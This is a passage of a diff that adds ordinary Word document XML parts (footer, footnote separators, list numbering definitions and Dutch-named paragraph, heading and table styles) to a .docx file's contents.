+    <w:pPr>
+      <w:pStyle w:val="Voettekst"/>
+    </w:pPr>
+  </w:p>
+</w:ftr>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
+</file>
+
+<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid wp14">
+  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="040C79D2"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6642535C"/>
+    <w:lvl w:ilvl="0" w:tplc="1000000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="10000019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="1000001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="1000000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="10000019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="1000001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="1000000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="10000019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="1000001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="24F73E60"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="2C2AB914"/>
+    <w:lvl w:ilvl="0" w:tplc="1000000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="10000019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="1000001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="1000000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="10000019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="1000001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="1000000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="10000019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="1000001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="547B4634"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="1000001F"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1.%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="792" w:hanging="432"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1.%2.%3."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1224" w:hanging="504"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1.%2.%3.%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1728" w:hanging="648"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2232" w:hanging="792"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2736" w:hanging="936"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="1080"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3744" w:hanging="1224"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="1440"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:num w:numId="1">
+    <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+</w:numbering>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -749,6 +3027,71 @@
     <w:name w:val="Normal"/>
     <w:qFormat/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Kop1">
+    <w:name w:val="heading 1"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:next w:val="Standaard"/>
+    <w:link w:val="Kop1Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:qFormat/>
+    <w:rsid w:val="003758A1"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="240" w:after="0"/>
+      <w:outlineLvl w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Kop2">
+    <w:name w:val="heading 2"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:next w:val="Standaard"/>
+    <w:link w:val="Kop2Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="007D48D4"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="40" w:after="0"/>
+      <w:outlineLvl w:val="1"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Kop3">
+    <w:name w:val="heading 3"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:next w:val="Standaard"/>
+    <w:link w:val="Kop3Char"/>
+    <w:uiPriority w:val="9"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="00B45677"/>
+    <w:pPr>
+      <w:keepNext/>
+      <w:keepLines/>
+      <w:spacing w:before="40" w:after="0"/>
+      <w:outlineLvl w:val="2"/>
+    </w:pPr>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
   <w:style w:type="character" w:default="1" w:styleId="Standaardalinea-lettertype">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
@@ -800,6 +3143,316 @@
       <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
       <w:lang/>
     </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Kop1Char">
+    <w:name w:val="Kop 1 Char"/>
+    <w:basedOn w:val="Standaardalinea-lettertype"/>
+    <w:link w:val="Kop1"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="003758A1"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="32"/>
+      <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Kopvaninhoudsopgave">
+    <w:name w:val="TOC Heading"/>
+    <w:basedOn w:val="Kop1"/>
+    <w:next w:val="Standaard"/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:qFormat/>
+    <w:rsid w:val="003758A1"/>
+    <w:pPr>
+      <w:outlineLvl w:val="9"/>
+    </w:pPr>
+    <w:rPr>
+      <w:lang/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Inhopg1">
+    <w:name w:val="toc 1"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:next w:val="Standaard"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002E0755"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="Hyperlink">
+    <w:name w:val="Hyperlink"/>
+    <w:basedOn w:val="Standaardalinea-lettertype"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002E0755"/>
+    <w:rPr>
+      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
+      <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Koptekst">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:link w:val="KoptekstChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002E0755"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4513"/>
+        <w:tab w:val="right" w:pos="9026"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="KoptekstChar">
+    <w:name w:val="Koptekst Char"/>
+    <w:basedOn w:val="Standaardalinea-lettertype"/>
+    <w:link w:val="Koptekst"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="002E0755"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Voettekst">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:link w:val="VoettekstChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="002E0755"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4513"/>
+        <w:tab w:val="right" w:pos="9026"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="VoettekstChar">
+    <w:name w:val="Voettekst Char"/>
+    <w:basedOn w:val="Standaardalinea-lettertype"/>
+    <w:link w:val="Voettekst"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="002E0755"/>
+  </w:style>
+  <w:style w:type="table" w:styleId="Tabelraster">
+    <w:name w:val="Table Grid"/>
+    <w:basedOn w:val="Standaardtabel"/>
+    <w:uiPriority w:val="39"/>
+    <w:rsid w:val="002E0755"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="auto"/>
+      </w:tblBorders>
+    </w:tblPr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Rastertabel4-Accent1">
+    <w:name w:val="Grid Table 4 Accent 1"/>
+    <w:basedOn w:val="Standaardtabel"/>
+    <w:uiPriority w:val="49"/>
+    <w:rsid w:val="002E0755"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
+        <w:left w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
+        <w:right w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
+        <w:insideH w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
+        <w:insideV w:val="single" w:sz="4" w:space="0" w:color="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
+      </w:tblBorders>
+    </w:tblPr>
+    <w:tblStylePr w:type="firstRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+        <w:color w:val="FFFFFF" w:themeColor="background1"/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="single" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
+          <w:left w:val="single" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
+          <w:right w:val="single" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
+          <w:insideH w:val="nil"/>
+          <w:insideV w:val="nil"/>
+        </w:tcBorders>
+        <w:shd w:val="clear" w:color="auto" w:fill="4472C4" w:themeFill="accent1"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="double" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
+        </w:tcBorders>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="firstCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Vert">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Horz">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
+      </w:tcPr>
+    </w:tblStylePr>
+  </w:style>
+  <w:style w:type="table" w:styleId="Lijsttabel6kleurrijk-Accent1">
+    <w:name w:val="List Table 6 Colorful Accent 1"/>
+    <w:basedOn w:val="Standaardtabel"/>
+    <w:uiPriority w:val="51"/>
+    <w:rsid w:val="002E0755"/>
+    <w:pPr>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+    <w:rPr>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+    </w:rPr>
+    <w:tblPr>
+      <w:tblStyleRowBandSize w:val="1"/>
+      <w:tblStyleColBandSize w:val="1"/>
+      <w:tblBorders>
+        <w:top w:val="single" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
+        <w:bottom w:val="single" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
+      </w:tblBorders>
+    </w:tblPr>
+    <w:tblStylePr w:type="firstRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
+        </w:tcBorders>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastRow">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+      <w:tblPr/>
+      <w:tcPr>
+        <w:tcBorders>
+          <w:top w:val="double" w:sz="4" w:space="0" w:color="4472C4" w:themeColor="accent1"/>
+        </w:tcBorders>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="firstCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="lastCol">
+      <w:rPr>
+        <w:b/>
+        <w:bCs/>
+      </w:rPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Vert">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
+      </w:tcPr>
+    </w:tblStylePr>
+    <w:tblStylePr w:type="band1Horz">
+      <w:tblPr/>
+      <w:tcPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3" w:themeFill="accent1" w:themeFillTint="33"/>
+      </w:tcPr>
+    </w:tblStylePr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Kop2Char">
+    <w:name w:val="Kop 2 Char"/>
+    <w:basedOn w:val="Standaardalinea-lettertype"/>
+    <w:link w:val="Kop2"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="007D48D4"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:sz w:val="26"/>
+      <w:szCs w:val="26"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Kop3Char">
+    <w:name w:val="Kop 3 Char"/>
+    <w:basedOn w:val="Standaardalinea-lettertype"/>
+    <w:link w:val="Kop3"/>
+    <w:uiPriority w:val="9"/>
+    <w:rsid w:val="00B45677"/>
+    <w:rPr>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
+      <w:sz w:val="24"/>
+      <w:szCs w:val="24"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Inhopg3">
+    <w:name w:val="toc 3"/>
+    <w:basedOn w:val="Standaard"/>
+    <w:next w:val="Standaard"/>
+    <w:autoRedefine/>
+    <w:uiPriority w:val="39"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00B45677"/>
+    <w:pPr>
+      <w:spacing w:after="100"/>
+      <w:ind w:left="440"/>
+    </w:pPr>
